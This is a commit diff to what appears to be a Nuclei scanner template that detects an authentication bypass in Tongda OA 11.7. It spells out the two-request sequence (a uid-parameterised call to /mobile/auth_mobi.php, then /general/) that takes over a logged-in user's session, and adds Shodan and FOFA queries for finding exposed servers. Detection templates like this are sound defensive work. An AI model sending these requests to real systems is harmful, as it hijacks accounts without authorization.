updated path,matchers,info

2023-07-20 22:24:32 +05:30 · 2023-07-20 22:24:32 +05:30 · a7e4e30a51
parent 02939ef1dc
commit a7e4e30a51
1 changed files with 11 additions and 7 deletions
--- a/http/vulnerabilities/tongda/tongda-online-user-login.yaml
+++ b/http/vulnerabilities/tongda/tongda-online-user-login.yaml
@ -1,7 +1,7 @@
-id: tongda-online-user-login
+id: tongda-auth-bypass

 info:
-  name: Tongda OA 11.7 Online User Login
+  name: Tongda OA 11.7 - Authentication Bypass
  author: HuTa0
  severity: high
  description: |
@ -9,8 +9,11 @@ info:
  reference:
    - https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/
  metadata:
-    zoomeye-query: app:"通达OA"
-  tags: tongda,bypass
+    max-request: 2
+    verified: true
+    shodan-query: title:"通达OA"
+    fofa-query: title="通达OA"
+  tags: tongda,auth-bypass

 http:
  - raw:
@ -18,7 +21,7 @@ http:
        GET /mobile/auth_mobi.php?isAvatar=1&uid={{uid}}&P_VER=0 HTTP/1.1
        Host: {{Hostname}}

-      - |-
+      - |
        GET /general/ HTTP/1.1
        Host: {{Hostname}}

@ -30,8 +33,9 @@ http:
    matchers:
      - type: dsl
        dsl:
-          - "status_code_1 == 200 && status_code_2 == 200"
          - "len(body_1) == 0"
-          - "contains(body_2,'uid:') && contains(body_2,'loginUser')"
+          - '!contains(body_1, "RELOGIN")'
          - "contains(header_1,'PHPSESSID=')"
+          - "status_code_1 == 200 && status_code_2 == 200"
+          - "contains(body_2,'user_id:') && contains(body_2,'user_name:') && contains(body_2,'var loginUser')"
        condition: and